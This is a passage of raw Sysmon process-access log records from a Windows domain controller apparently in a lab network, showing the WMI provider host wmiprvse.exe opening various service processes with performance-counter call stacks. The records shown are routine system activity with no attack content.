indows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program 